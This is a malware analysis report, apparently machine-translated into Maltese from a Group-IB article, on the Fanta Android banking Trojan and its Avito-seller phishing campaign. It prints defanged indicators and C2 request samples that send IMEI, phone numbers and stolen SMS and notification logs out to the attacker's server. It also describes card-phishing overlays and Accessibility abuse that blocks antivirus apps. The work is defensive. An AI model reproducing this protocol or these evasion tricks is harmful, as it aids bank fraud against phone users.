Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan

Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan

Ġurnata waħda trid tbigħ xi ħaġa fuq Avito u, wara li poġġiet deskrizzjoni dettaljata tal-prodott tiegħek (pereżempju, modulu RAM), tirċievi dan il-messaġġ:

Leisya, Fanta: tattiċi ġodda tal-antik Android TrojanLadarba tiftaħ il-link, tara paġna li tidher innokwa li tinnotifika lilek, il-bejjiegħ kuntent u ta' suċċess, li sar xirja:

Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan
Ladarba tikklikkja l-buttuna "Kompli", fajl APK b'ikona u isem li jispira l-fiduċja jitniżżlu fuq it-tagħmir Android tiegħek. Installajt applikazzjoni li għal xi raġuni talbet id-drittijiet tal-AccessibilityService, imbagħad dehru ftit twieqi u sparixxew malajr u... Dak hu.

Inti tmur tiċċekkja l-bilanċ tiegħek, iżda għal xi raġuni l-app bankarja tiegħek terġa' titlob id-dettalji tal-karta tiegħek. Wara li ddaħħal id-dejta, tiġri xi ħaġa terribbli: għal xi raġuni għadha mhix ċara għalik, il-flus jibdew jisparixxu mill-kont tiegħek. Qed tipprova ssolvi l-problema, iżda t-telefon tiegħek jirreżisti: jagħfas it-tasti "Lura" u "Home", ma jintefax u ma jippermettilek tattiva l-ebda miżura ta 'sigurtà. Bħala riżultat, inti titħalla mingħajr flus, l-oġġetti tiegħek ma nxtrawx, inti konfuż u tistaqsi: x'ġara?

It-tweġiba hija sempliċi: inti sirt vittma tal-Android Trojan Fanta, membru tal-familja Flexnet. Kif ġara dan? Ejja nispjegaw issa.

Awturi: Andrey Polovinkin, speċjalista junior fl-analiżi tal-malware, Ivan Pisarev, speċjalista fl-analiżi tal-malware.

Xi statistiċi

Il-familja Flexnet ta' Android Trojans saret magħrufa għall-ewwel darba lura fl-2015. Matul perjodu ta 'attività pjuttost twil, il-familja espandiet għal diversi sottospeċi: Fanta, Limebot, Lipton, eċċ. It-Trojan, kif ukoll l-infrastruttura assoċjata miegħu, ma jibqgħux wieqfa: qed jiġu żviluppati skemi ta’ distribuzzjoni effettivi ġodda - fil-każ tagħna, paġni ta’ phishing ta’ kwalità għolja mmirati lejn utent-bejjiegħ speċifiku, u l-iżviluppaturi Trojan isegwu xejriet tal-moda fil- kitba tal-virus - iżżid funzjonalità ġdida li tagħmilha possibbli li tisraq flus b'mod aktar effiċjenti minn apparat infettat u tevita mekkaniżmi ta' protezzjoni.

Il-kampanja deskritta f'dan l-artikolu hija mmirata lejn utenti mir-Russja; numru żgħir ta 'apparati infettati ġew irreġistrati fl-Ukraina, u saħansitra inqas fil-Każakstan u l-Belarus.

Anke jekk Flexnet ilu fl-arena Android Trojan għal aktar minn 4 snin issa u ġie studjat fid-dettall minn ħafna riċerkaturi, għadu f'forma tajba. Minn Jannar 2019, l-ammont potenzjali ta 'ħsara huwa aktar minn 35 miljun rublu - u dan huwa biss għal kampanji fir-Russja. Fl-2015, diversi verżjonijiet ta 'dan it-Trojan Android inbiegħu fuq forums taħt l-art, fejn seta' jinstab ukoll il-kodiċi tas-sors tat-Trojan b'deskrizzjoni dettaljata. Dan ifisser li l-istatistika tal-ħsara fid-dinja hija saħansitra aktar impressjonanti. Mhux indikatur ħażin għal raġel xiħ bħal dan, hux?

Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan

Mill-bejgħ għall-qerq

Kif jidher mill-screenshot ippreżentata qabel ta 'paġna ta' phishing għas-servizz tal-Internet għall-istazzjonar ta 'reklami Avito, kienet ippreparata għal vittma speċifika. Apparentement, l-attakkanti jużaw wieħed mill-parsers ta 'Avito, li estratti n-numru tat-telefon u l-isem tal-bejjiegħ, kif ukoll id-deskrizzjoni tal-prodott. Wara li tespandi l-paġna u tipprepara l-fajl APK, il-vittma tintbagħat SMS b'ismu u link għal paġna tal-phishing li fiha deskrizzjoni tal-prodott tiegħu u l-ammont riċevut mill-"bejgħ" tal-prodott. Billi tikklikkja fuq il-buttuna, l-utent jirċievi fajl APK malizzjuż - Fanta.

Studju tad-dominju shcet491[.]ru wera li huwa delegat lis-servers DNS ta’ Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Il-fajl taż-żona tad-dominju fih entrati li jindikaw l-indirizzi IP 31.220.23[.]236, 31.220.23[.]243, u 31.220.23[.]235. Madankollu, ir-rekord tar-riżorsi primarji tad-dominju (rekord A) jindika server b'indirizz IP 178.132.1[.]240.

L-indirizz IP 178.132.1[.]240 jinsab fl-Olanda u jappartjeni lill-hoster WorldStream. L-indirizzi IP 31.220.23[.]235, 31.220.23[.]236 u 31.220.23[.]243 jinsabu fir-Renju Unit u jappartjenu għas-server ta’ hosting kondiviż HOSTINGER. Użat bħala recorder openprov-ru. Id-dominji li ġejjin ġew solvuti wkoll għall-indirizz IP 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Għandu jiġi nnutat li links fil-format li ġej kienu disponibbli minn kważi d-dominji kollha:

http://(www.){0,1}<%domain%>/[0-9]{7}

Dan il-mudell jinkludi wkoll link minn messaġġ SMS. Ibbażat fuq data storika, instab li dominju wieħed jikkorrispondi għal diversi links fil-mudell deskritt hawn fuq, li jindika li dominju wieħed intuża biex iqassam it-Trojan lil diversi vittmi.

Ejja naqbżu ftit 'il quddiem: it-Trojan imniżżel permezz ta' link minn SMS juża l-indirizz bħala server ta' kontroll onusedseddohap[.]club. Dan id-dominju ġie rreġistrat fi 2019-03-12, u mill-2019-04-29, l-applikazzjonijiet APK interaġixxew ma' dan id-dominju. Ibbażat fuq data miksuba minn VirusTotal, total ta’ 109 applikazzjoni interaġixxew ma’ dan is-server. Id-dominju nnifsu riżolta għall-indirizz IP 217.23.14[.]27, li tinsab fl-Olanda u proprjetà tal-hoster WorldStream. Użat bħala recorder namecheap. Id-dominji ġew solvuti wkoll għal dan l-indirizz IP bad-racoon[.]klabb (li jibda mill-2018-09-25) u bad-racoon[.]live (li jibda mill-2018-10-25). Bil-dominju bad-racoon[.]klabb aktar minn 80 fajl APK interazzjoni magħhom bad-racoon[.]live - aktar minn 100.

B'mod ġenerali, l-attakk jimxi kif ġej:

Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan

X'hemm taħt l-għatu ta' Fanta?

Bħal ħafna Trojans Android oħra, Fanta huwa kapaċi jaqra u jibgħat messaġġi SMS, jagħmel talbiet USSD, u juri t-twieqi tiegħu stess fuq l-applikazzjonijiet (inklużi dawk bankarji). Madankollu, wasal l-armament tal-funzjonalità ta 'din il-familja: Fanta bdiet tuża Servizz ta' Aċċessibilità għal diversi skopijiet: qari tal-kontenut ta’ notifiki minn applikazzjonijiet oħra, prevenzjoni ta’ skoperta u twaqqaf l-eżekuzzjoni ta’ Trojan fuq apparat infettat, eċċ. Fanta jaħdem fuq il-verżjonijiet kollha ta' Android mhux iżgħar minn 4.4. F'dan l-artikolu se nagħtu ħarsa aktar mill-qrib lejn il-kampjun Fanta li ġej:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immedjatament wara t-tnedija

Immedjatament wara t-tnedija, it-Trojan jaħbi l-ikona tiegħu. L-applikazzjoni tista' taħdem biss jekk l-isem tal-apparat infettat ma jkunx fil-lista:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(leħja)

Din il-verifika titwettaq fis-servizz ewlieni tat-Trojan - MainService. Meta titnieda għall-ewwel darba, il-parametri tal-konfigurazzjoni tal-applikazzjoni huma inizjalizzati għal valuri awtomatiċi (il-format għall-ħażna tad-dejta tal-konfigurazzjoni u t-tifsira tagħhom se jiġu diskussi aktar tard), u apparat ġdid infettat jiġi rreġistrat fuq is-server tal-kontroll. Talba HTTP POST bit-tip ta' messaġġ tintbagħat lis-server register_bot u informazzjoni dwar l-apparat infettat (verżjoni Android, IMEI, numru tat-telefon, isem tal-operatur u kodiċi tal-pajjiż li fih l-operatur huwa rreġistrat). L-indirizz iservi bħala s-server tal-kontroll hXXp://onuseseddohap[.]club/controller.php. Bi tweġiba, is-server jibgħat messaġġ li jkun fih l-oqsma bot_id, bot_pwd, servers — l-applikazzjoni ssalva dawn il-valuri bħala parametri tas-server CnC. Parametru servers mhux obbligatorju jekk il-field ma ġiex riċevut: Fanta juża l-indirizz tar-reġistrazzjoni - hXXp://onuseseddohap[.]club/controller.php. Il-funzjoni li tinbidel l-indirizz CnC tista 'tintuża biex issolvi żewġ problemi: biex tqassam it-tagħbija b'mod uniformi bejn diversi servers (jekk ikun hemm numru kbir ta' apparati infettati, it-tagħbija fuq server tal-web mhux ottimizzat tista 'tkun għolja), u wkoll biex tuża server alternattiv fil-każ ta' falliment ta' wieħed mis-servers CnC.

Jekk iseħħ żball waqt li tibgħat it-talba, it-Trojan jirrepeti l-proċess ta 'reġistrazzjoni wara 20 sekonda.

Ladarba l-apparat ikun ġie rreġistrat b'suċċess, Fanta se juri l-messaġġ li ġej lill-utent:

Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan
Nota importanti: is-servizz sejjaħ Sigurtà tas-sistema — l-isem tas-servizz Trojan, u wara li tikklikkja l-buttuna OK Tinfetaħ tieqa bis-settings tal-Aċċessibilità tal-apparat infettat, fejn l-utent irid jagħti drittijiet tal-Aċċessibilità għas-servizz malizzjuż:

Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan
Hekk kif l-utent jixgħel Servizz ta' Aċċessibilità, Fanta jikseb aċċess għall-kontenut tat-twieqi tal-applikazzjoni u l-azzjonijiet imwettqa fihom:

Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan
Immedjatament wara li jirċievi d-drittijiet ta’ Aċċessibilità, it-Trojan jitlob drittijiet ta’ amministratur u drittijiet biex jaqra n-notifiki:

Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan
Bl-użu tal-AccessibilityService, l-applikazzjoni tissimula keystrokes, u b'hekk tagħti lilha nnifisha d-drittijiet kollha meħtieġa.

Fanta joħloq każijiet multipli tad-database (li se jiġu deskritti aktar tard) meħtieġa biex taħżen id-dejta tal-konfigurazzjoni, kif ukoll l-informazzjoni miġbura fil-proċess dwar l-apparat infettat. Biex tibgħat l-informazzjoni miġbura, it-Trojan joħloq kompitu ripetut iddisinjat biex tniżżel oqsma mid-database u jirċievi kmand mis-server tal-kontroll. L-intervall għall-aċċess għal CnC huwa stabbilit skont il-verżjoni Android: fil-każ ta '5.1, l-intervall ikun ta' 10 sekondi, inkella 60 sekonda.

Biex tirċievi l-kmand, Fanta tagħmel talba GetTask lis-server tal-ġestjoni. Bi tweġiba, CnC jista 'jibgħat wieħed mill-kmandi li ġejjin:

Team Deskrizzjoni
0 Ibgħat messaġġ SMS
1 Agħmel telefonata jew kmand USSD
2 Taġġorna parametru intervall
3 Taġġorna parametru jinterċettaw
6 Taġġorna parametru smsManager
9 Ibda tiġbor messaġġi SMS
11 Irrisettja t-telefon tiegħek għall-issettjar tal-fabbrika
12 Jippermettu/Iżżarma l-illoggjar tal-ħolqien tal-kaxxa tad-djalogu

Fanta tiġbor ukoll notifiki minn 70 app bankarja, sistemi ta' ħlas veloċi u kartieri elettroniċi u jaħżnuhom f'database.

Il-ħażna tal-parametri tal-konfigurazzjoni

Biex taħżen il-parametri tal-konfigurazzjoni, Fanta juża approċċ standard għall-pjattaforma Android - preferenzi-fajls. Is-settings jiġu ssejvjati f'fajl imsemmi settings. Deskrizzjoni tal-parametri salvati tinsab fit-tabella hawn taħt.

isem Valur default Valuri possibbli Deskrizzjoni
id 0 Integer ID tal-bot
servers hXXp://onuseseddohap[.]club/ URL Kontroll l-indirizz tas-server
pwd - String Password tas-server
intervall 20 Integer Intervall tal-ħin. Jindika kemm għandhom jiġu differiti l-kompiti li ġejjin:

  • Meta tibgħat talba dwar l-istatus ta 'messaġġ SMS mibgħut
  • Jirċievi kmand ġdid mis-server ta 'ġestjoni

jinterċettaw kollha kollha/TelNumber Jekk il-qasam huwa ugwali għas-sekwenza kollha jew TelNumber, allura l-messaġġ SMS riċevut jiġi interċettat mill-applikazzjoni u mhux muri lill-utent
smsManager 0 0/1 Ippermetti/itwaqqaf l-applikazzjoni bħala r-riċevitur tal-SMS default
readDialog falza Veru/falz Ippermetti/Iżżejjen l-illoggjar tal-avvenimenti AċċessibilitàAvveniment

Fanta juża wkoll il-fajl smsManager:

isem Valur default Valuri possibbli Deskrizzjoni
pckg - String Isem tal-maniġer tal-messaġġi SMS użat

Interazzjoni ma' databases

Matul it-tħaddim tiegħu, it-Trojan juża żewġ databases. Database msemmija a użati biex jaħżnu informazzjoni varji miġbura mit-telefon. It-tieni database hija msemmija fanta.db u jintuża biex isalva settings responsabbli għall-ħolqien ta' twieqi tal-phishing iddisinjati biex jiġbru informazzjoni dwar karti bankarji.

Trojan juża database а biex taħżen l-informazzjoni miġbura u tilloggja l-azzjonijiet tiegħek. Id-dejta hija maħżuna f'tabella zkuk. Biex toħloq tabella, uża l-mistoqsija SQL li ġejja:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Id-database fiha l-informazzjoni li ġejja:

1. Logging tal-istartjar tal-apparat infettat b'messaġġ It-telefon mixgħul!

2. Notifiki minn applikazzjonijiet. Il-messaġġ huwa ġġenerat skont il-mudell li ġej:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Data tal-kards tal-bank minn forom ta' phishing maħluqa mit-Trojan. Parametru VIEW_NAME jista' jkun wieħed minn dawn li ġejjin:

  • AliExpress
  • Avito
  • Google Play
  • Mixxellanji <%App Name%>

Il-messaġġ huwa illoggjat fil-format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Messaġġi SMS deħlin/ħerġin fil-format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informazzjoni dwar il-pakkett li joħloq il-kaxxa tad-djalogu fil-format:

(<%Package name%>)<%Package information%>

Eżempju ta' tabella zkuk:

Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan
Waħda mill-funzjonalità tal-Fanta hija l-ġbir ta 'informazzjoni dwar il-karti tal-bank. Il-ġbir tad-dejta jseħħ permezz tal-ħolqien ta 'twieqi tal-phishing meta jinfetħu applikazzjonijiet bankarji. It-Trojan joħloq it-tieqa tal-phishing darba biss. Informazzjoni li t-tieqa ġiet murija lill-utent hija maħżuna f'tabella settings fid-database fanta.db. Biex toħloq database, uża l-mistoqsija SQL li ġejja:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

L-oqsma kollha tat-tabella settings awtomatikament inizjalizzat għal 1 (oħloq tieqa tal-phishing). Wara li l-utent idaħħal id-dejta tiegħu, il-valur jiġi ssettjat għal 0. Eżempju ta' oqsma tat-tabella settings:

  • can_login — il-qasam huwa responsabbli biex juri l-formola meta tiftaħ applikazzjoni bankarja
  • l-ewwel_bank - mhux użat
  • can_avito — il-qasam huwa responsabbli biex juri l-formola meta tiftaħ l-applikazzjoni Avito
  • can_ali — il-qasam huwa responsabbli biex juri l-formola meta tiftaħ l-applikazzjoni ta’ Aliexpress
  • jista_ieħor — il-qasam huwa responsabbli biex juri l-formola meta tiftaħ kwalunkwe applikazzjoni mil-lista: Yula, Pandao, Drom Auto, Kartiera. Kards ta' skont u bonus, Aviasales, Booking, Trivago
  • can_card — il-field huwa responsabbli biex juri l-formola meta tiftaħ Google Play

Interazzjoni mas-server tal-ġestjoni

L-interazzjoni tan-netwerk mas-server tal-ġestjoni sseħħ permezz tal-protokoll HTTP. Biex taħdem man-netwerk, Fanta juża l-librerija popolari Retrofit. It-talbiet jintbagħtu lil: hXXp://onuseseddohap[.]club/controller.php. L-indirizz tas-server jista' jinbidel meta tirreġistra fuq is-server. Il-cookies jistgħu jintbagħtu bi tweġiba mis-server. Fanta jagħmel it-talbiet li ġejjin lis-server:

  • Ir-reġistrazzjoni tal-bot fuq is-server tal-kontroll isseħħ darba, mal-ewwel tnedija. Id-dejta li ġejja dwar l-apparat infettat tintbagħat lis-server:
    · Cookie — cookies riċevuti mis-server (il-valur default huwa string vojta)
    · mod — kostanti tal-korda register_bot
    · prefiss — kostanti numru sħiħ 2
    · version_sdk — hija ffurmata skont il-mudell li ġej: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · IMEI — IMEI tal-apparat infettat
    · pajjiż — kodiċi tal-pajjiż li fih l-operatur huwa rreġistrat, fil-format ISO
    · numru - numru tat-telefon
    · operatur — isem l-operatur

    Eżempju ta’ talba mibgħuta lis-server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    Bi tweġiba għat-talba, is-server għandu jirritorna oġġett JSON li jkun fih il-parametri li ġejjin:
    · bot_id — ID tal-apparat infettat. Jekk bot_id huwa ugwali għal 0, Fanta jerġa' jesegwixxi t-talba.
    bot_pwd — password għas-server.
    server — l-indirizz tas-server tal-kontroll. Parametru mhux obbligatorju. Jekk il-parametru ma jkunx speċifikat, se jintuża l-indirizz issejvjat fl-applikazzjoni.

    Eżempju ta' oġġett JSON:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • Talba biex tirċievi kmand mis-server. Id-dejta li ġejja tintbagħat lis-server:
    · Cookie — cookies riċevuti mis-server
    · offerta — id tal-apparat infettat li ġie riċevut meta bagħtet it-talba register_bot
    · pwd —password għas-server
    · divice_admin — il-qasam jiddetermina jekk inkisbux drittijiet ta' amministratur. Jekk ikunu nkisbu drittijiet ta' amministratur, il-qasam huwa ugwali għal 1, inkella 0
    · Aċċessibilità — L-istatus tal-operat tas-Servizz ta' Aċċessibilità. Jekk is-servizz inbeda, il-valur huwa 1, inkella 0
    · SMSManager — turi jekk it-Trojan huwiex attivat bħala l-applikazzjoni awtomatika biex tirċievi SMS
    · iskrin — juri f'liema stat jinsab l-iskrin. Il-valur se jiġi stabbilit 1, jekk l-iskrin huwa mixgħul, inkella 0;

    Eżempju ta’ talba mibgħuta lis-server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Skont il-kmand, is-server jista 'jirritorna oġġett JSON b'parametri differenti:

    · Team Ibgħat messaġġ SMS: Il-parametri fihom in-numru tat-telefon, it-test tal-messaġġ SMS u l-ID tal-messaġġ li qed jintbagħat. L-identifikatur jintuża meta jintbagħat messaġġ lis-server bit-tip setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Team Agħmel telefonata jew kmand USSD: In-numru tat-telefon jew il-kmand jiġi fil-korp tar-rispons.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Team Ibdel il-parametru tal-intervall.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Team Ibdel il-parametru tal-interċettazzjoni.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · Team Ibdel il-qasam tal-SmsManager.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Team Iġbor messaġġi SMS minn apparat infettat.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Team Irrisettja t-telefon tiegħek għall-issettjar tal-fabbrika:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Team Ibdel il-parametru ReadDialog.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Tibgħat messaġġ bit-tip setSmsStatus. Din it-talba ssir wara li jiġi esegwit il-kmand Ibgħat messaġġ SMS. It-talba tidher bħal din:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Tlugħ tal-kontenut tad-database. Ringiela waħda tiġi trażmessa għal kull talba. Id-dejta li ġejja tintbagħat lis-server:
    · Cookie — cookies riċevuti mis-server
    · mod — kostanti tal-korda setSaveInboxSms
    · offerta — id tal-apparat infettat li ġie riċevut meta bagħtet it-talba register_bot
    · test — test fir-rekord tad-database kurrenti (field d mit-tabella zkuk fid-database а)
    · numru — isem tar-rekord tad-database kurrenti (field p mit-tabella zkuk fid-database а)
    · sms_mode — valur sħiħ (field m mit-tabella zkuk fid-database а)

    It-talba tidher bħal din:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Jekk tintbagħat b'suċċess lis-server, ir-ringiela titħassar mit-tabella. Eżempju ta' oġġett JSON ritornat mis-server:

    {
        "response":[],
        "status":"ok"
    }

Interazzjoni ma' AccessibilityService

AccessibilityService ġie implimentat biex jagħmel it-tagħmir Android aktar faċli biex jintuża għal persuni b'diżabilità. F'ħafna każijiet, interazzjoni fiżika hija meħtieġa biex jinteraġixxu ma 'applikazzjoni. AccessibilityService jippermettilek li tagħmelhom b'mod programmatiku. Fanta juża s-servizz biex joħloq twieqi foloz fl-applikazzjonijiet bankarji u jipprevjeni lill-utenti milli jiftħu s-settings tas-sistema u xi applikazzjonijiet.

Bl-użu tal-funzjonalità tal-AccessibilityService, it-Trojan jimmonitorja l-bidliet fl-elementi fuq l-iskrin tal-apparat infettat. Kif deskritt qabel, is-settings tal-Fanta fihom parametru responsabbli għall-operazzjonijiet tal-illoggjar b'kaxxi tad-djalogu - readDialog. Jekk dan il-parametru jiġi ssettjat, l-informazzjoni dwar l-isem u d-deskrizzjoni tal-pakkett li wassal għall-avveniment se tiġi miżjuda mad-database. It-Trojan iwettaq l-azzjonijiet li ġejjin meta jinħolqu avvenimenti:

  • Jissimula l-ippressar taċ-ċwievet tad-dahar u tad-dar fil-każijiet li ġejjin:
    · jekk l-utent irid jerġa 'jibda l-apparat tiegħu
    · jekk l-utent irid iħassar l-applikazzjoni “Avito” jew ibiddel id-drittijiet ta’ aċċess
    · jekk hemm referenza għall-applikazzjoni “Avito” fil-paġna
    · meta tiftaħ l-applikazzjoni Google Play Protect
    · meta tiftaħ paġni b'settings ta' AccessibilityService
    · meta tidher il-kaxxa tad-djalogu tas-Sigurtà tas-Sistema
    · meta tiftaħ il-paġna bis-settings "Iġbed fuq app oħra".
    · meta tiftaħ il-paġna "Applikazzjonijiet", "Irkupru u reset", "Reset tad-data", "Reset settings", "Panew tal-iżviluppatur", "Speċjali. opportunitajiet”, “Opportunitajiet speċjali”, “Drittijiet speċjali”
    · jekk l-avveniment ġie ġġenerat minn ċerti applikazzjonijiet.

    Lista ta' applikazzjonijiet

    • android
    • Master Lite
    • Kaptan nadif
    • Nadif Master għal CPU x86
    • Ġestjoni tal-Permess tal-Applikazzjoni Meizu
    • Sigurtà MIUI
    • Clean Master - Antivirus & Cache u Garbage Cleaner
    • Kontrolli tal-ġenituri u GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Sigurtà PRO
    • Avast antivirus & protezzjoni ħielsa 2019
    • Sigurtà mobbli MegaFon
    • Protezzjoni AVG għal Xperia
    • Sigurtà mobbli
    • Malwarebytes antivirus u protezzjoni
    • Antivirus għal Android 2019
    • Master tas-Sigurtà - Antivirus, VPN, AppLock, Booster
    • AVG antivirus għall-Maniġer tas-Sistema tal-pillola Huawei
    • Samsung Aċċessibilità
    • Samsung Smart Manager
    • Kaptan tas-sigurtà
    • Booster tal-veloċità
    • dr.web
    • Spazju tas-Sigurtà Dr.Web
    • Dr.Web Mobile Control Center
    • Dr.Web Sigurtà Spazjali Ħajja
    • Dr.Web Mobile Control Center
    • Antivirus & Sigurtà Mobbli
    • Kaspersky Internet Security: Antivirus u Protezzjoni
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protezzjoni u ġestjoni
    • AVG Antivirus ħielsa 2019 – Protezzjoni għal Android
    • Android Antivirus
    • Norton Mobile Security u Antivirus
    • Antivirus, firewall, VPN, sigurtà mobbli
    • Sigurtà mobbli: antivirus, VPN, protezzjoni kontra s-serq
    • Antivirus għal Android

  • Jekk jintalab permess meta jintbagħat messaġġ SMS lil numru qasir, Fanta tissimula li tikklikkja fuq il-kaxxa tal-kontroll Ftakar l-għażla u buttuna Ibgħat.
  • Meta tipprova tneħħi d-drittijiet tal-amministratur mit-Trojan, tissakkar l-iskrin tat-telefon.
  • Jipprevjeni li żżid amministraturi ġodda.
  • Jekk l-applikazzjoni antivirus dr.web misjuba theddida, Fanta timita tagħfas il-buttuna jinjora.
  • It-Trojan jissimula li tagħfas il-buttuna tad-dahar u tad-dar jekk l-avveniment ġie ġġenerat mill-applikazzjoni Kura tal-Apparat Samsung.
  • Fanta toħloq twieqi tal-phishing b'formoli biex tiddaħħal informazzjoni dwar kards bankarji jekk tkun imnedija applikazzjoni minn lista ta' madwar 30 servizz differenti tal-Internet. Fosthom: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, eċċ.

    Formoli ta' phishing

    Fanta janalizza liema applikazzjonijiet qed jaħdmu fuq l-apparat infettat. Jekk tkun infetħet applikazzjoni ta’ interess, it-Trojan juri tieqa tal-phishing fuq l-oħrajn kollha, li hija formola biex tiddaħħal l-informazzjoni tal-kard tal-bank. L-utent għandu jdaħħal id-dejta li ġejja:

    • Numru tal-kard
    • Data ta' skadenza tal-karta
    • CVV
    • Isem tad-detentur tal-kard (mhux għall-banek kollha)

    Skont l-applikazzjoni li qed taħdem, se jintwerew twieqi differenti tal-phishing. Hawn taħt hawn eżempji ta’ xi wħud minnhom:

    Aliexpress:

    Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan
    Avito:

    Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan
    Għal xi applikazzjonijiet oħra, eż. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: tattiċi ġodda tal-antik Android Trojan

    Kif kien verament

    Fortunatament, il-persuna li rċeviet il-messaġġ SMS deskritt fil-bidu tal-artiklu rriżulta li kien speċjalista taċ-ċibersigurtà. Għalhekk, il-verżjoni reali, mhux tad-direttur hija differenti minn dik li qalulha qabel: persuna rċeviet SMS interessanti, u wara tah lit-tim tal-Intelligence tal-Kaċċa tat-Theddid tal-Grupp-IB. Ir-riżultat tal-attakk huwa dan l-artikolu. Tmiem it-tajjeb, hux? Madankollu, mhux l-istejjer kollha jispiċċaw b'hekk b'suċċess, u sabiex tiegħek ma tidhirx qisha qatgħa ta 'direttur b'telf ta' flus, fil-biċċa l-kbira tal-każijiet huwa biżżejjed li żżomm mar-regoli li ġejjin deskritti fit-tul:

    • tinstallax applikazzjonijiet għal apparat mobbli b'Android OS minn xi sorsi minbarra Google Play
    • Meta tinstalla applikazzjoni, agħti attenzjoni speċjali lid-drittijiet mitluba mill-applikazzjoni
    • tagħti attenzjoni lill-estensjonijiet tal-fajls imniżżla
    • tinstalla l-aġġornamenti tal-OS Android regolarment
    • ma żżurx riżorsi suspettużi u ma tniżżel fajls minn hemm
    • Tikklikkjax fuq links riċevuti f'messaġġi SMS.

Sors: www.habr.com

Żid kumment